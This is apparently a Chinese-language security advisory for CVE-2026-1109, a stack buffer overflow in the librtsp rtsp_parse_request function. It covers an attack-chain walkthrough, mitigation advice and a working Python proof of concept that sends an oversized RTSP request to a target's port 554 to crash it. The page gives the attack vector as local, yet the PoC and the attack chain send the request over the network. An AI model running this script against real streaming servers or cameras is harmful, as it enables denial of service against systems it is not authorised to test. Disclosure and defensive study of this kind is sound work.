CVE-2026-1109 librtsp rtsp_parse_request 缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2026-1109

漏洞类型

缓冲区溢出

CVSS评分

5.3 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

cijliu librtsp

漏洞概述

CVE-2026-1109是cijliu librtsp软件库中的一个缓冲区溢出漏洞。该漏洞存在于RTSP协议解析模块的rtsp_parse_request函数中，攻击者可以通过构造恶意的RTSP请求数据包来触发该漏洞。由于该产品采用滚动发布模式（rolling releases），版本信息不明确，受影响范围可能涵盖所有使用该库进行RTSP协议解析的应用程序。rtsp_parse_request函数在处理请求数据时未对输入长度进行充分验证，导致数据写入缓冲区时超出边界。该漏洞被分类为本地攻击（AV:L），需要低权限认证（PR:L），但无需用户交互（UI:N），CVSS评分为5.3（中危）。攻击成功可导致程序崩溃（拒绝服务）或在特定条件下可能实现代码执行。鉴于RTSP协议在视频监控、流媒体等领域的广泛应用，该漏洞可能影响大量物联网设备和流媒体服务器。

技术细节

该漏洞位于cijliu librtsp库的rtsp_parse_request函数中，属于典型的栈缓冲区溢出（Stack Buffer Overflow）问题。函数在解析RTSP请求时，未对请求行（Request Line）和头部字段（Header Fields）的长度进行严格边界检查。当接收到超长的请求数据时，数据被直接复制到固定大小的栈缓冲区中，覆盖相邻的栈帧数据，包括返回地址和保存的寄存器值。攻击者可以通过发送精心构造的RTSP请求（如超长的URL路径、异常的Header值等）来利用此漏洞。在本地攻击场景下，攻击者需要具备在目标系统上执行代码的能力，通过向使用librtsp库的应用程序发送恶意请求来触发溢出。成功利用可能导致：1）覆盖返回地址控制程序执行流；2）覆写函数指针实现代码执行；3）破坏栈结构导致程序崩溃。防御层面需要在数据复制操作前进行严格的边界检查，使用安全的字符串处理函数（如strncpy、snprintf等），并启用栈保护机制（Stack Canary、ASLR等）。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统上使用librtsp库进行RTSP协议解析的应用程序，如RTSP服务器、流媒体播放器或视频监控系统

STEP 2

步骤2：构造恶意请求

攻击者构造包含超长字段的恶意RTSP请求数据包，在URL路径、Header值或Authorization字段中注入超过缓冲区大小的数据

STEP 3

步骤3：发送恶意数据包

通过本地或网络方式向目标应用程序的RTSP服务端口（通常为554）发送精心构造的恶意请求

STEP 4

步骤4：触发缓冲区溢出

rtsp_parse_request函数在处理请求时未进行边界检查，将超长数据复制到固定大小的栈缓冲区中，导致栈溢出

STEP 5

步骤5：控制执行流或导致崩溃

溢出数据覆盖返回地址和栈帧数据，攻击者可通过精心构造payload实现代码执行，或导致程序崩溃引发拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2026-1109 PoC - librtsp rtsp_parse_request Buffer Overflow
# This PoC demonstrates sending a malicious RTSP request with oversized headers

import socket
import sys

def create_malicious_rtsp_request():
    """Generate a malformed RTSP request to trigger buffer overflow in rtsp_parse_request"""
    
    # RTSP method and path
    method = "DESCRIBE"
    path = "/" + "A" * 2000  # Long path to overflow buffer
    
    # RTSP version
    version = "RTSP/1.0\r\n"
    
    # Malformed headers with oversized values
    headers = {
        "CSeq": "1",
        "User-Agent": "A" * 1500,  # Oversized User-Agent header
        "Accept": "A" * 1000,
        "Authorization": "A" * 2000  # Potential overflow point
    }
    
    # Build the request
    request = f"{method} {path} {version}"
    for header, value in headers.items():
        request += f"{header}: {value}\r\n"
    request += "\r\n"
    
    return request.encode('utf-8')

def exploit(target_ip, target_port=554):
    """Send the malicious RTSP request to target"""
    
    print(f"[*] Sending malicious RTSP request to {target_ip}:{target_port}")
    print(f"[*] Request size: {len(create_malicious_rtsp_request())} bytes")
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        
        # Send malicious request
        sock.send(create_malicious_rtsp_request())
        print("[+] Malicious request sent successfully")
        
        # Wait for response
        try:
            response = sock.recv(4096)
            print(f"[+] Received response: {response[:100]}")
        except socket.timeout:
            print("[!] No response received - target may have crashed")
        
        sock.close()
        return True
        
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 554
    
    exploit(target, port)

影响范围

cijliu librtsp <= 2ec1a81ad65280568a0c7c16420d7c10fde13b04

防御指南

临时缓解措施

由于该产品采用滚动发布模式，建议立即停止使用受影响版本的librtsp库，或联系开发者获取最新修复版本。在等待官方修复期间，可通过以下措施缓解风险：1）限制RTSP服务的访问权限，仅允许受信任的IP地址访问；2）部署入侵检测系统（IDS）监控异常的RTSP请求；3）使用防火墙规则限制RTSP端口的入站连接；4）实施网络隔离，将RTSP服务部署在独立的隔离网段；5）定期监控应用程序日志，及时发现异常行为。